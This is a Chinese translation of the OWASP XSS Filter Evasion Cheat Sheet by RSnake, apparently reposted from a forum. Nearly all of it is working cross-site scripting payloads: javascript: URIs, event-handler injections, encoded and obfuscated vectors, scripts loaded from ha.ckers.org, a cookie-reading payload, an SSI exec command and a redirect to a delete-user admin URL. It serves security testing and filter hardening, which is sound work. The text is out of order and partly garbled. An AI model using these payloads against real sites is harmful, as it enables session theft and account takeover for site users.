TD像上面一样,TD也可以通过 BACKGROUND 来包含javascript xss向量

<TABLE><TD BACKGROUND="javascript:alert('XSS')">


DIV background-image<DIV STYLE="background-image: url(javascript:alert('XSS'))">



使用 unicoded编码xss利用代码的DIV background-image这是被轻微的修改去混淆 url 参数。他是最早被发现被 Renaud Lifchitz用于攻击hotmail。

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
附加额外字符的DIV background-imageRnaske开发了一个XSS fuzzer去探测可以在开括号和javascript之间加入哪些额外字符在 IE和安全模式下的
Netscape 8.1。都是一些十进制的字符,但是你也可以用十六进制来填充。(下面这些编码字符可以被使用:1-32, 34, 39, 160,
8192-8.13, 12288, 65279)

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">


DIV expression它的一个变体是更加有效的去绕过实际的xss过滤器是在冒号和表达式之间添加换行符。
<DIV STYLE="width: expression(alert('XSS'));">


html条件选择注释块只能工作在IE5.0 以及更新版或是使用了ie渲染引擎的Netscape 8.1 。
一些网站认为任何包裹在注释中的内容都是安全的,因此并不会被移除。这将允许我们的xss向量。或者系统可能通过添加注释对某些内容去试图无害的渲染它。
如我们所见,这有时并不起作用。

<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->


BASE标签工作ie或是使用了安全模块的Netscape 8.1,你需要使用 "//"
斜体文本去避免javascript错误。这需要当前网站使用相对路径(例如images/image.jpg)而不是绝对路径。如果路径开始用一个斜杠
(例如"/images/image.jpg"),你需要去掉xss向量中的一个斜杠(只有在两个斜杠的情况下才会起到注释作用)

<BASE HREF="javascript:alert('XSS');//">


OBJECT标签如果允许objects标签,你也可以注入病毒payloads去感染用户。类似于APPLET标签。这个链接文件是一个包含xss代码的html文件。
<OBJECT TYPE="text/x-scriptlet" DATA="[url=http://ha.ckers.org/scriptlet.html"></OBJECT>&#10;]http://ha.ckers.org/scriptlet.html"></OBJECT>[/url]


使用一个你可以载入包含有xss代码的flash文件的 EMBED 标签点击这个demo,如果你加入属性allowScriptAccess="never" and allownetworking="internal"他可以缓解这个风险(谢谢Jonathan Vanasco 的这个信息)

<EMBED SRC=" A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


使用在flash中的ActionScript可以混淆你的xss向量a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);



CDATA混淆的 XML数据岛这个xss向量尽可以在IE 和使用了ie渲染引擎的 Netscape 8.1 下工作。它是 Sec Consult在审计雅虎时发现。

<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>


使用XML数据岛生成含有javascript代码的当前域xml文件它是相同的同上面仅仅代替XML文件为当前域文件。你可以看到结果在下面。


HTML+TIME 在XML中它展示的 Grey Magic 是怎样攻击 Hotmail 和 Yahoo!的。它是仅仅可以工作在ie和使用了ie渲染引擎的Netscape 8.1。并且这段代码需要放在html域body标签之间。

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>



简单的修改字符去绕过过滤器对 ".js"的过滤你可以重命名你的javascript文件为一个图片作为xss向量

<SCRIPT SRC="[url=http://ha.ckers.org/xss.jpg"></SCRIPT>&#10;]http://ha.ckers.org/xss.jpg"></SCRIPT>[/url]


SSI (服务器端包含)这需要SSI被安装在服务器端去使用这个xss向量。但可能我并不需要提及这点,因为如果你可以运行命令在服务器端,那么毫无异味会有更加严重的问题存在。
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=[url=http://ha.ckers.org/xss.js></SCRIPT>'"-->&#10;]http://ha.ckers.org/xss.js></SCRIPT>'"-->[/url]
PHP需要php被安装在服务器端去使用这个xss向量。同样的,如果你可以运行恩任何远程脚本,那么将会有更加严重的问题。

<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>


嵌入命令的IMG它是工作于那些需要用户认证后才可以执行命令的当前域页面。它将可以创建删除用户(如果访问者是管理员),或是寄送某些凭证等等,虽然他是较少被使用但是是非常有用的。

<IMG SRC="[url=http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">&#10;]http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">[/url]
嵌入命令的IMG II这是更加的可怕因为并没有特别的标识符去使它看起开来可疑。除非不允许引入第三方域的图片。这个向量是使用一个 302 or 304(或其他可行方案)去重定向一个图片地址为带有某些命令的地址。因此一个正常的图片标签代码<IMG
SRC="a.jpg">可以是带有命令的xss向量。但是用户看到的仅仅是正常的图片链接地址。下面是一个.htaccess(apche下)配
置文件去完成这个向量。(感谢Timo为这部分。)

Redirect 302 /a.jpg [url=http://victimsite.com/admin.aspundefineddeleteuser&#10;]http://victimsite.com/admin.asp&deleteuser
[/url]
Cookie篡改这是公认的不着边际,但是我已经发下一个例子是用 <META
去覆盖cookie。另一个例子是有些网站使用cookie中的某些数据去呈现在当前访问者的网页中为仅仅他自己而不是从远程数据库中获取。当这两个清静
联系在一起的时候,你可以通过修改cookie让javascript输入到用户页面中。(你可以借此让用户退出,改变用户的状态,甚至让用户以你的身份
登录)

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">


UTF-7编码如果存在xss的页面没有提供页面charset header,或是对于任何被设为UTF-7
的浏览器,我们可以利用下面的代码。(感谢Roman Ivanov
的提供),点击这儿为这个例子。(如果页面设置是自动识别编码且content-types 没有被覆盖,在ie浏览器或使用了IE渲染引擎的
Netscape 8.1,咋你不需要声明 charset
)在没有改变编码的情况下它是不能工作在任何现代浏览器,这是为什么它被标记为完全不支持。Watchfire发现这个漏洞在Google's 自定义
404 脚本中.

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-


使用HTML 引用封装的xss他是被测试在ie,具体因情况而异。它是为了绕过那些可以输入 "<SCRIPT>" 但不允许输入 "<SCRIPT SRC…",通过正则"/<script[^>]+src/i"进行过滤的xss过滤区。

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js">
为了执行xss代码在那些允许输入"<SCRIPT>" 但不允许 "<script src…"靠正则拼配"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i" (这个是重要的,因为我已经看到这个正则在实际环境中。)

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
另一个逃避相同正则 "/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"的xss代码

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这是另一个xss例子去绕过相同的过滤器,关于"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"
的正则过滤。我知道,我说过我将不会去痛痛快快的聊减灾技术。但是这是我所看到的唯一例子在允许用户输入<SCRIPT>但是不允许通过
src加在远程脚本的过滤这个xss的可用方法。(当然,还有一些其他方法去处理它,如果它们允许<SCRIPT> )

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
最后一个绕过"/<script((\s+\w+(\s=\s(?:"(.)?"|'(.)?'|[^'">\s]+))?)+\s|\s)src/i"正则匹配的例子,通过重音符。(再以无法工作在firfox)

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这个xss例子押注域哪些正则并不去拼配一对引号,而是去发现任何引号后就立即结束参数字符串。

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
这xss仍然让我担心,因为他是几乎没有肯呢过去停止在没有阻止活动内容的情况下。

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="[url=http://ha.ckers.org/xss.js"></SCRIPT>&#10;]http://ha.ckers.org/xss.js"></SCRIPT>
[/url]
URL 字符串绕过这里假设 "http://www.google.com/" 这种在语法上是不被允许的。
IP代替域名

<A HREF="http://66.102.7.147/">XSS</A>

URL 编码

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
双字节编码(注意:有其他的双字节编码变种。请参考下面混淆后的ip为更多信息)

<A HREF="http://1113982867/">XSS</A>
十六进制编码The total size of each number allowed is somewhere in the neighborhood
of 240 total characters as you can see on the second
digit,因为十六进制数实在0-f之间,因此第三位开头的0可以被省略掉。

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
八进制编码Again padding is allowed, although you must keep it above 4 total characters per class – as in class A, class B, etc…:

<A HREF="http://0102.0146.0007.00000223/">XSS</A>
混合编码让我们混合基本编码并且插入一个tab和换行符。为什么浏览器允许这样,我是不知道。但是它是可以工作当它们被包含在引号之间。


<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
协议绕过“//”代替“http:// ”
可以节省更多字符。这是非常有用的当输入空间是有限的时候。两个字符可能解决大问题。也是容易绕过像"(ht|f)tp(s)?://"
这样的正则过滤。(感谢 Ozh 提出这部分)。你也可以改变//" 为 "\"。你需要保持斜杠在适当的地方。否则可能会被当作一个相对路径的url。

<A HREF="//www.google.com/">XSS</A>
Google "feeling lucky" IFirefox 使用 Google的"feeling lucky"
函数去重定向用户输入的任何关键字。因此你可以在可利用页面使用任何关键字针对任何Firefox用户。它是使用了"keyword:"
协议。你可以使用多个关键字像下面的例子:XSS+RSnake。它是无法使用在 Firefox as of 2.0。

<A HREF="//google">XSS</A>
Google "feeling lucky" II这是使用一个小技巧让他工作在Firefox,因为只有它实现了 "feeling lucky" 函数。不像下一个例子,它是无法工作在 Opera
,由于
Opera认为它是一种老的钓鱼攻击。它是一个简单的畸形url。如果你点击弹出框的确定按钮它将工作。但是由于这是一个错误对话框,我是说Opera是
不支持它。它也不再被支持在 Firefox 2.0。

<A HREF="http://ha.ckers.org@google">XSS</A>
Google "feeling lucky" III它是通过畸形url来工作在Firefox 和 Opera浏览器。因为只有他们实现了 "feeling lucky" 函数。像上面的例子一样,它们需要你的网站在谷歌搜索中排名第一。(例如google)

<A HREF="http://google:ha.ckers.org">XSS</A>
移除别名结合上面的url。移除 "www." 将节省四个字符。

<A HREF="http://google.com/">XSS</A>
绝对 DNS用额外的点

<A HREF="http://www.google.com./">XSS</A>
JavaScript link location

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
针对内容替换的攻击向量假设 "http://www.google.com/"
会被替换为空。我确实使用了一个简单的攻击向量去针对特殊文字过滤依靠过滤器本身。这是一个例子去帮助创建向量。(IE: "java script:"
被替换为"java script:", 它是仍可以工作在 IE,使用安全模块的 Netscape 8.1+ 和 Opera)

<A HREF="[url=http://www.gohttp://www.google.com/ogle.com/">XSS</A>&#10;]http://www.gohttp://www.google.com/ogle.com/">XSS</A>
[/url]
字符编码表再付 "<" 在html或是javascript中所有可能的编码形式。它们绝大多数是无法正常渲染的,但是可以在上文中某些情景下得到渲染。
<
%3C
&lt
<
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
字符编码和ip混淆器
下面地址中包含了在xss有用的各种基本转换器。
http://ha.ckers.org/xsscalc.html



作者和主编:Robert "RSnake" Hansen
翻译:老道
  查看全部
原文地址:http://drops.wooyun.org/tips/1955
在我另一个大表哥的博客看到的,貌似他不想别人知道他的博客,我就不放出他的博客了。@redfree

译者注:
翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的
各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而非代
码本身。
一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文。所以虽然我本身英语很烂,xss技术也很烂,但还是去翻译了这篇文
章。当然这也导致最后翻译出来的文章晦涩难懂、不知所云。这个真心向大家说声抱歉啊,也希望大家能及时帮忙提出文中的翻译错误或其他错误。
另外,在翻译过程中,我发现XSS Filter Evasion Cheat
Sheet原版本身也存在一些技术上的或是描述上的错误。不过虽然我知道原文中某些地方可能出错,但是我也不知道正确的应该是什么样的,还有就是或许原文
本身是对的,但是我理解错了。种种原因吧,最后基本上都按原文在翻译,有些觉得可能存在错误的地方或是我理解不了的地方,我就没有翻译,继续使用英文。希
望大家可以帮忙给出翻译或是解释。
如果大家有能力阅读英文的话,尽量阅读原文,即使要看这个翻译版,也配合英文版一起看。不要让我的翻译错误误人子弟啊。最后希望大家可以和我一起解决翻译中的各种错误,把这个中文版维护好。
谢谢
源文档地址:https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
翻译文档在线阅读:https://www.zybuluo.com/laodao/note/9592
介绍
这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:
http://ha.ckers.org/xss.html
。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site
Scripting) Prevention Cheat Sheet灵感来源于RSnake的 XSS Cheat
Sheet,所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者去帮助他们预防xss漏洞,而不是创建一个复杂的备忘录去简单的
告诉他们需要去预防各种千奇百怪的攻击。所以,OWASP备忘录系列诞生了。

测试
这个备忘录主要针对那些已经理解了最基本的xss攻击,但是想要深入理解各种过滤器绕过的细微差别的学习者。
请注意大部分的xss攻击向量已经在其代码下方给出了测试过的浏览器列表。

xss 探测器
注入下面这些代码,在大多数没有特殊xss向量要求而已遭受脚本攻击的地方将会弹出单词“xss”。使用url编码器去编码你的整个代码。小技巧:如果你是急切的需要快去检测一个页面,通常只需要注入轻量的 "<任意字符>" 标签,然后判断输出点是否受到干扰就可以判断是否xss漏洞了。

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
[quote]</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

xss 探测器2
如果你没有充足的输入空间去检测页面是否存在xss漏洞。下面这段代码是一个好的简洁的xss注入检测代码。在注入这段代码后,查看页面源代码寻找是否存在看起来像 <XSS verses <XSS这样的输入点从而判断是否存在xss漏洞。[/quote]

'';!--"<XSS>=&{()}

无过滤绕过
这是一个常规的xss注入代码,虽然通常它会被防御,但是我们建议首先去尝试它。(引号是不被需要的在任何现代浏览器中,因此这里省略了它。)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

通过javascript指令实现的图片xss
图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的例子仅仅展示了一种其他标签依旧通用的原理。)
<IMG SRC="javascript:alert('XSS');">

无引号无分号
<IMG SRC=javascript:alert('XSS')>

不区分大小写的xss攻击向量
<IMG SRC=JaVaScRiPt:alert('XSS')>

html 实体
The semicolons are required for this to work:
<IMG SRC=javascript:alert("XSS")>

重音符混淆
如果你的javascript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包裹javascript代码。它也经常会非常有用因为xss过滤代码未考虑到这个字符。

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

畸形的A标签
跳过href属性,而直接获取xss实质攻击代码…提出被David Cross ~ 已验证在chrome浏览器

<a onmouseover="alert(document.cookie)">xxs link</a>
此外,chrome浏览器喜欢去不全确实的引号为你。如果你遇到阻碍那么直接省略它们吧,chrome将会正确的帮你不全缺失的引号在URL和script中。

<a onmouseover=alert(document.cookie)>xxs link</a>

畸形的IMG标签
最早被 Begeek发现(可以短小而干净的运行于任何浏览器),这个xss向量依靠松散的渲染引擎解析IMG标签中被引号包含的字符串来实现。我猜测它最初是为了正确编码而造成的。这将使它更加困难的去解释HTML标签。

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode
如果没有任何形式的引号被允许,你可以eval()一串fromCharCode在javascript来创建任何你需要的xss向量。

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

默认SRC属性去绕过SRC域名检测过滤器

这将绕过绝大多数SRC域名过滤器。插入javascript代码在任何一个事件方法同样适用于热河一个HTML标签,例如Form、
Iframe、Input、Embed等等。他将也允许任何任何该标签的相关事件去替换,例如onblur,
onclick等,后面我们会附加一个可用的事件列表。由David Cross提供,Abdullah Hussam编辑。

<IMG SRC=# onmouseover="alert('xxs')">

默认SRC属性通过省略它的值
<IMG SRC= onmouseover="alert('xxs')">


默认SRC属性通过完全不设置它
<IMG onmouseover="alert('xxs')">


通过error事件触发alert
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>


十进制html编码引用
所有在使用javascript指令的xss示例将无法工作在 Firefox 或 Netscape 8.1+,因为它们使用了 Gecko 渲染引擎。使用 XSS Calculator 获取更多信息。

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>


结尾没有分号的十进制html编码引用
他是经常有用的在绕过寻找"&#XX;"格式的xss过滤,因为大多数人不知道最多允许7位字符的编码限制。这也是有用的对那些对字符串解码像$tmp_string =~ s/.\&#(\d+);./$1/; ,错误的认为一个html编码需要用;去结束。(我是无意中发现)

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
结尾没有分号的十六进制html编码引用
这也是一种实用的xss攻击针对上文的$tmp_string =~ s/.\&#(\d+);./$1/; ,错误的认为数字编码跟随在#后面(十六进制htnl编码并非如此),。使用 XSS Calculator 获取更多信息。

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


内嵌TAB
用来分开xss攻击代码
<IMG SRC="jav ascript:alert('XSS');">



内嵌被编码的TAB
用来分开xss攻击代码
<IMG SRC="jav&#x09;ascript:alert('XSS');">


内嵌换行符去分开xss代码
一些网站声称09-13编码的所有字符(十进制)都可以实现这种形式的攻击。这是不正确的。只有09(tab), 10 (换行) 和 13 (回车)可以使用。查看ascii表为更详细的信息。下面四个xss例子展示了这个向量。
<IMG SRC="jav&#x0A;ascript:alert('XSS');">



编码回车符去分开xss代码
注意:上面我编写的三个xss字符串比必须的字符串更长,原因是0可以被省略。通常我看到的过滤器假设十六进制和十进制的编码是两到三个字符。正确的应该是一到七个字符。

<IMG SRC="jav&#x0D;ascript:alert('XSS');">


没有分割的javascript指令
null字符也可以作为一个xss向量,但是不像上边那样。你需要直接注入它们利用一些工具例如Burp Proxy,或是使用 
在你的url字符串里。或者如果你想写你自己的注入工具你可以使用vim(^V^@
会生成null),以及用下面的程序去生成它到一个文本文件中。好吧,我再一次撒谎了。 Opera的老版本(大约 7.11 on
Windows)是脆弱的对于一个额外的字符173(软连字符)。但是null字符
是更加的有用或者帮助我们绕过某些真实存在的过滤器用过变动像这个例子中的。

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out


图片元素中javascript之前的空格和元字符为xss
xss过滤拼配模式没有考虑单词"javascript:"中可能存在空格是正确的,因为否则将无法渲染。但是这也导致了错误的假设认为你不可以有一个空格在引号和 "javascript:" 单词之间。事实上你可以插入 1-32编码字符(十进制)中的任何字符。

<IMG SRC=" &#14; javascript:alert('XSS');">


非字母数字字符xss
Firefox html解析器设定一个非数字字母字符不是有效的在一个html关键字后面,因此这些字符会被视为空白符或是无效的token在html标签之后。这导致很多xss过滤器错误的认为html标签必须是被空白符隔断的。例如,"<SCRIPT\s" != "<SCRIPT/XSS\s":

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
和上面的原理相同,我们继续扩大,Gecko渲染引擎允许字母、数字、html封装字符以外的任何字符位于事件处理器与等号之间。从而借此绕过xss过滤器。注意这也是适用于重音符如下所示:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Yair Amit 提示我有一个小区别在 ie和Gecko 渲染引擎之间是他们仅允许一个一个斜杠在html标签和参数之间,在不使用空格的情况下。这可能是有用的在那些不允许输入空格的系统中。
<SCRIPT/SRC="[url=http://ha.ckers.org/xss.js"></SCRIPT>&#10;]http://ha.ckers.org/xss.js"></SCRIPT>
[/url]

附加的开括号
Franz
Sedlmaier提出,利用这个xss向量可以绕过某些检测引擎,因为这些引擎通过拼配最早出现的一对尖括号,并且提取其内部内容作为标签,而没有使用
更加有效的算法例如
Boyer-Moore(寻找打开的尖括号以及相关标签的模糊拼配)。代码中的双斜杠可以抑制额外尖括号导致的javascript错误。
<<SCRIPT>alert("XSS");//<</SCRIPT>


没关闭的script标签

对于使用了 Gecko渲染引擎的Firefox 和 Netscape 8.1
,你并不需要常规xss中"></SCRIPT>"这部分。 Firefox会帮你闭合标签,并且加入结束标签。多么的体贴啊!
Unlike the next one, which doesn't effect Firefox, this does not require
any additional HTML below it.
如果需要,你可以加入引号,但通常他并不是必须的。注意,我并不清楚这个代码被注入后html代码会闭合成什么样子。

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >


script标签中的协议解析
这个特殊的变体由 Łukasz Pilorz 提出,并且基于上文中 Ozh提出的协议解析绕过。这个xss例子工作在 IE,
使用IE渲染引擎的Netscape 以及加了在结尾的 Opera。这是非常有用的在输入长度受到限制。域名越短越好。
".j"是有效的,不需要考虑编码问题因为浏览拿起可以自动识别在一个script标签中。

<SCRIPT SRC=//ha.ckers.org/.j>


半开的HTML/JavaScript xss向量
不同于 Firefox
,ie渲染引擎不会加入额外的数据到你的页面。但是它允许javascript指定在图片标签中这是有用的作为一个xss向量,因为它不需要一个结束的尖
括号。你可以插入这个xss向量在任何html标签后面。甚至没有用">"关闭标签。 A note: this does mess up
the HTML, depending on what HTML is beneath it. It gets around the
following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't
require the end ">". 这也是有效的去对付真实的xss过滤器,我曾经碰见过试用半开的<IFRAME 标签替代
<IMG 标签,

<IMG SRC="javascript:alert('XSS')"


双开尖括号
使用一个开始尖括号(<)在向量结尾代替一个关闭尖括号(>)会有不同的影响在 Netscape Gecko 的渲染中。 Without it, Firefox will work but Netscape won't。

<iframe src=http://ha.ckers.org/scriptlet.html <


转义javascript中的转义
当一个应用程序是输出用户自定义的信息到javascript代码中,例如: <SCRIPT>var
a="$ENV{QUERY_STRING}";</SCRIPT>。如果你想插入你自己的javascript代码进入它,但是服务器转义
了其中的某些引号,这时你需要通过转义被转义的字符来绕过它。从而使最终的输入代码类似于<SCRIPT>var
a="\";alert('XSS');//";</SCRIPT>
。最终\转义了双引号前被服务器添加的\,而双引号则不会被转义,从而触发xss向量。xss定位器使用这个方法。

\";alert('XSS');//


闭合title标签
这是一个简单的xss向量,可以引入一个恶意的xss攻击。译者注:titile标签内部不支持html代码,所有内容会被自动转义为普通字符。
</TITLE><SCRIPT>alert("XSS");</SCRIPT>


INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


BODY image
<BODY BACKGROUND="javascript:alert('XSS')">


IMG DYNSRC(视频剪辑)
<IMG DYNSRC="javascript:alert('XSS')">


IMG lowsrc(低分辨率图片)
<IMG LOWSRC="javascript:alert('XSS')">


List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>


List-style-image
为带有符号的列表嵌入自定义图片的符号。它是只能工作在ie渲染引擎因为javascript指令。这不是一个特别有用的xss向量。
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>


VBscript in an image
<IMG SRC='vbscript:msgbox("XSS")'>



Livescript (仅适用于老版本的Netscape)
<IMG SRC="livescript:">


BODY 标签
这个方法不需要使用任何"javascript:" or "<SCRIPT..." 的变体去实现xss攻击。Dan Crowley特别指出你可以额外的加入一个空格在等号之前("onload=" != "onload ="):
<BODY ONLOAD=alert('XSS')>



事件处理程序
它可以被用于上文中的一些共性xss攻击(这是最完整的一个实时更新的在线列表)。感谢Rene Ledosquet 的更新。此外你可以参考 Dottoro Web Reference 或是 events in JavaScript.
1. FSCommand() (攻击者可以使用它当执行一个嵌入的flash对象时)
2. onAbort() (当使用者终止一张正在载入的图片)
3. onActivate() (当对象被设置为激活元素)
4. onAfterPrint() (用户打印或是预览打印工作后激活)
5. onAfterUpdate() (激活在一个数据对象当源对象数据更新后)
6. onBeforeActivate() (触发在一个对象被设置为激活元素)
7. onBeforeCopy() (攻击者执行攻击代码在一个选区被复制到剪贴板之前-攻击者可以实现它通过execCommand("Copy")函数。)
8. onBeforeCut() (攻击者执行攻击代码在在一个选区被剪贴。)
9. onBeforeDeactivate() (当激活元素被改变后触发)
10. onBeforeEditFocus() (触发在一个可被编辑的元素内的对象就按测到一个 UI-activated状态或是一个可被编辑对象被选择之前)
11. onBeforePaste() (用户需要被欺骗执行粘贴或是去触发它通过execCommand("Paste")函数。)
12. onBeforePrint() (用户需要被欺骗执行打印或是攻击者可以使用print()或是execCommand("Print")函数。)
13. onBeforeUnload() (用户需要被欺骗关闭浏览器-攻击者不可以 unload windows除非它是被执行从其父窗口。)
14. onBeforeUpdate() (激活在数据对象在源对象更新数据之后。)
15. onBegin() (onbegin 事件被立即触发当元素的声明周期开始后)
16. onBlur() (当失去焦点时触发*)
17. onBounce() (触发当选框对象的behavior属性被设置为"alternate"或是选框的内容抵达窗口的一边。)
18. onCellChange() (触发当数据改变在数据provider)
19. onChange() (select, text, or TEXTAREA 字段失去焦点或是它们的值是被改变。)
20. onClick()(点击事件)
21. onContextMenu() (用户需要右击在攻击攻击区域)
22. onControlSelect() (当用户去控制一个选择对象时触发。)
23. onCopy() (用户需要去copy某些东西或是利用execCommand("Copy")命令)
24. onCut() (用户需要copy某些东西或是利用execCommand("Cut") 命令)
25. onDataAvailable() (用户改变数据在某个元素上或是攻击者可以执行相同的函数。)
26. onDataSetChanged() (当源数据对象被改变时触发)
27. onDataSetComplete() (触发当数据是成功获取到从数据源对象)
28. onDblClick() (用户双击某个元素。)
29. onDeactivate() (当当前元素失去激活状态时触发)
30. onDrag() (需要用户拖动某个对象)
31. onDragEnd() (需要用户拖动某个对象)
32. onDragLeave() (需要用户拖动某个对象从一个有效的位置。)
33. onDragEnter() (需要用户拖动某个对象从一个有效的位置。)
34. onDragOver() (需要用户拖动某个对象从一个有效的位置。)
35. onDragDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
36. onDragStart() (当用户开始拖动操作时发生。)
37. onDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
38. onEnd() (当生命周期结束时触发)
39. onError() (载入document 或 image发生错误时触发)
40. onErrorUpdate() (当更新数据源的相关对象时发生错误则触发)
41. onFilterChange() (当一个滤镜完成状态改变时触发)
42. onFinish() (移动的Marquee文字完成一次移动时触发)
43. onFocus() (当窗口获得焦点时攻击者可以执行代码)
44. onFocusIn() (当窗口获得焦点时攻击者可以执行代码)
45. onFocusOut() (当窗口失去焦点时攻击者可以执行代码)
46. onHashChange() (当当前地址的hash发生改变时触发)
47. onHelp() (当用户在当前窗口点击F1时触发攻击代码)
48. onInput() (可编辑元素中的内容被用户改变后出发)
49. onKeyDown() (用户按下一个键)
50. onKeyPress() (用户点击或是按下一个键)
51. onKeyUp() (用户释放一个键)
52. onLayoutComplete() (用户需要去打印或是打印预览)
53. onLoad() (攻击者执行攻击代码在窗口载入后)
54. onLoseCapture() (可以被触发被releaseCapture() 方法)
55. onMediaComplete() (当波翻改一个流媒体文件时,这个事件将触发在文件开始播放前。)
56. onMediaError() (当用户打开的页面包含一个媒体文件,并且发生错误时触发)
57. onMessage() (当文档对象接受到一个信息时触发)
58. onMouseDown() (攻击者需要让用户去点击一张图片。)
59. onMouseEnter() (光标移入一个对象或是区域)
